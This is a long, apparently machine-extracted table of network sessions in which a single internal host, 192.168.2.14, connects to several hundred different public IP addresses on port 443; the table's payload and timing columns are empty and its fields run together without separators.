                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20313192.168.2.144049269.72.186.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20314192.168.2.1435516148.42.212.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20315192.168.2.1457638162.39.42.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20316192.168.2.1435546139.140.134.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20317192.168.2.143654293.56.152.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20318192.168.2.1445588185.75.162.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20319192.168.2.144728242.240.33.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20320192.168.2.143854442.180.64.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20321192.168.2.1433358221.12.215.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20322192.168.2.1446586213.93.33.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20323192.168.2.1447580117.50.208.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20324192.168.2.1456962185.83.159.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20325192.168.2.1453008198.200.138.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20326192.168.2.1439344134.213.252.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20327192.168.2.1436228138.64.202.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20328192.168.2.1454788206.169.252.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20329192.168.2.1440746163.22.236.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20330192.168.2.1435946113.125.179.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20331192.168.2.1443734113.245.106.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20332192.168.2.144692282.38.237.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20333192.168.2.143974290.157.91.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20334192.168.2.145627662.15.8.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20335192.168.2.1451652179.34.25.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20336192.168.2.144051088.12.120.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20337192.168.2.144359632.9.83.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20338192.168.2.145409644.224.27.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20339192.168.2.1459538143.87.20.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20340192.168.2.144096432.224.231.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20341192.168.2.1436510118.206.135.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20342192.168.2.14376569.172.115.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20343192.168.2.1449244115.144.142.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20344192.168.2.1436714202.240.227.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20345192.168.2.144690442.211.172.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20346192.168.2.1442836216.73.64.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20347192.168.2.1444810193.155.180.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20348192.168.2.1451290184.252.135.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20349192.168.2.14341805.20.244.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20350192.168.2.143298280.243.232.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20351192.168.2.1442600185.75.235.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20352192.168.2.145313612.247.51.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20353192.168.2.143753244.205.65.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20354192.168.2.144804450.35.85.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20355192.168.2.145550895.177.133.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20356192.168.2.1452156176.25.114.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20357192.168.2.1456678119.6.158.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20358192.168.2.1460608188.81.196.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20359192.168.2.1444482148.135.171.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20360192.168.2.1435942174.63.211.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20361192.168.2.1432800166.63.85.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20362192.168.2.1438088203.99.140.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20363192.168.2.1457436143.49.9.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20364192.168.2.1443362122.36.206.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20365192.168.2.145418224.199.122.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20366192.168.2.143837650.199.185.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20367192.168.2.1436274223.82.113.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20368192.168.2.143547650.10.125.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20369192.168.2.1449128172.118.204.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20370192.168.2.144935490.204.112.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20371192.168.2.1448224201.131.41.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20372192.168.2.145393817.154.26.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20373192.168.2.1446516154.72.36.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20374192.168.2.1450624139.43.72.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20375192.168.2.1435878168.167.36.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20376192.168.2.1439570150.7.44.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20377192.168.2.145261496.22.114.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20378192.168.2.143633413.142.150.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20379192.168.2.1458518114.217.71.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20380192.168.2.1436136134.152.116.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20381192.168.2.1453718144.66.143.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20382192.168.2.1460940134.113.195.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20383192.168.2.1437864184.95.44.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20384192.168.2.144345646.226.88.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20385192.168.2.1452628121.164.237.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20386192.168.2.144682060.186.112.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20387192.168.2.1459466157.243.26.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20388192.168.2.144462662.130.227.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20389192.168.2.1459676207.72.200.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20390192.168.2.144413027.192.126.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20391192.168.2.1460882104.149.99.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20392192.168.2.1460172136.142.27.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20393192.168.2.1439912175.56.106.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20394192.168.2.146031287.7.165.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20395192.168.2.14487045.243.185.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20396192.168.2.145949250.65.215.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20397192.168.2.1457572137.25.197.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20398192.168.2.143594020.92.29.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20399192.168.2.1448866175.35.146.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20400192.168.2.1438442222.53.253.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20401192.168.2.1440960190.145.15.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20402192.168.2.1437528200.88.10.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20403192.168.2.1437332136.84.3.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20404192.168.2.1453712195.234.80.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20405192.168.2.1439070107.205.194.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20406192.168.2.144141424.212.179.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20407192.168.2.1446846115.96.37.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20408192.168.2.1459280187.30.110.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20409192.168.2.1454918211.1.22.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20410192.168.2.1443960112.231.185.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20411192.168.2.1438722166.22.193.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20412192.168.2.1442184191.108.39.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20413192.168.2.1455022105.158.122.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20414192.168.2.1451496164.104.110.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20415192.168.2.1459998111.191.98.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20416192.168.2.1450172108.155.115.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20417192.168.2.144262273.174.119.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20418192.168.2.144607258.66.124.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20419192.168.2.144391469.44.97.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20420192.168.2.1451282123.50.145.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20421192.168.2.1441272103.64.229.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20422192.168.2.143873460.120.24.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20423192.168.2.1452386102.26.160.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20424192.168.2.1435034162.133.123.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20425192.168.2.1436470115.240.173.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20426192.168.2.1436500211.231.49.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20427192.168.2.1442796221.54.239.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20428192.168.2.1455518116.127.107.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20429192.168.2.14506624.225.18.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20430192.168.2.1444452116.125.26.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20431192.168.2.143961042.254.221.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20432192.168.2.1440780141.104.236.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20433192.168.2.1435780111.98.230.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20434192.168.2.1439312207.161.3.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20435192.168.2.144366885.210.195.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20436192.168.2.14561449.94.144.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20437192.168.2.1435520152.196.249.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20438192.168.2.1446912156.233.107.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20439192.168.2.14491349.119.152.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20440192.168.2.145396246.16.237.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20441192.168.2.14361801.155.238.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20442192.168.2.1453740195.207.190.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20443192.168.2.145818212.139.210.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20444192.168.2.144974672.77.15.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20445192.168.2.1451552218.25.12.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20446192.168.2.1441082111.92.169.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20447192.168.2.144006039.11.105.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20448192.168.2.143637442.25.237.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20449192.168.2.144516687.132.55.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20450192.168.2.1454706136.181.36.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20451192.168.2.1454450183.149.218.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20452192.168.2.1456294182.103.21.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20453192.168.2.145750058.232.64.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20454192.168.2.145514468.5.68.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20455192.168.2.145869667.105.197.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20456192.168.2.145306853.15.95.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20457192.168.2.1446464212.201.230.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20458192.168.2.145899234.24.175.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20459192.168.2.1453764168.23.47.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20460192.168.2.1457954156.129.184.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20461192.168.2.143961034.194.30.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20462192.168.2.146091472.198.36.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20463192.168.2.1447818176.53.218.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20464192.168.2.144087031.230.175.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20465192.168.2.145336666.238.3.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20466192.168.2.145438898.45.219.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20467192.168.2.145216673.70.116.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20468192.168.2.143675263.60.80.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20469192.168.2.145493086.77.18.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20470192.168.2.1454174153.20.162.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20471192.168.2.143462424.68.88.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20472192.168.2.1434234147.188.140.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20473192.168.2.1444348155.94.133.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20474192.168.2.1458704109.82.164.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20475192.168.2.1455384161.75.247.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20476192.168.2.1448392129.52.117.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20477192.168.2.146019441.218.38.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20478192.168.2.1446458105.10.8.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20479192.168.2.1440498198.105.9.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20480192.168.2.145363865.180.129.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20481192.168.2.1433808197.75.214.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20482192.168.2.1452642121.30.22.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20483192.168.2.1442194182.68.227.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20484192.168.2.1441062137.247.75.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20485192.168.2.1438016105.102.186.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20486192.168.2.1443944152.150.131.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20487192.168.2.145332437.217.222.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20488192.168.2.1447652108.243.16.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20489192.168.2.1454506112.76.4.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20490192.168.2.144282220.141.32.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20491192.168.2.143769424.200.48.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20492192.168.2.1435720184.178.196.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20493192.168.2.145580662.96.93.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20494192.168.2.145304660.200.131.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20495192.168.2.1437530110.229.160.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20496192.168.2.1445188131.18.184.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20497192.168.2.1455300155.119.55.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20498192.168.2.146021284.61.20.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20499192.168.2.1453784132.87.192.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20500192.168.2.1445092104.232.201.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20501192.168.2.144828273.230.19.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20502192.168.2.143827466.255.252.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20503192.168.2.143531696.62.206.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20504192.168.2.1439084146.160.155.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20505192.168.2.1442830184.215.203.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20506192.168.2.1452558131.70.215.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20507192.168.2.143456835.51.77.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20508192.168.2.1433558159.134.133.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20509192.168.2.144688641.40.185.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20510192.168.2.144289467.128.85.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20511192.168.2.144237492.245.211.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20512192.168.2.1455590195.23.225.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20513192.168.2.143481081.5.224.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20514192.168.2.1442028207.66.126.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20515192.168.2.144352242.227.5.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20516192.168.2.1435640142.83.27.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20517192.168.2.1440818202.153.93.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20518192.168.2.1434612177.116.242.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20519192.168.2.145771625.18.179.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20520192.168.2.1446392174.143.139.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20521192.168.2.145643089.174.235.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20522192.168.2.1440708192.145.43.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20523192.168.2.14470589.187.76.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20524192.168.2.143906651.83.128.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
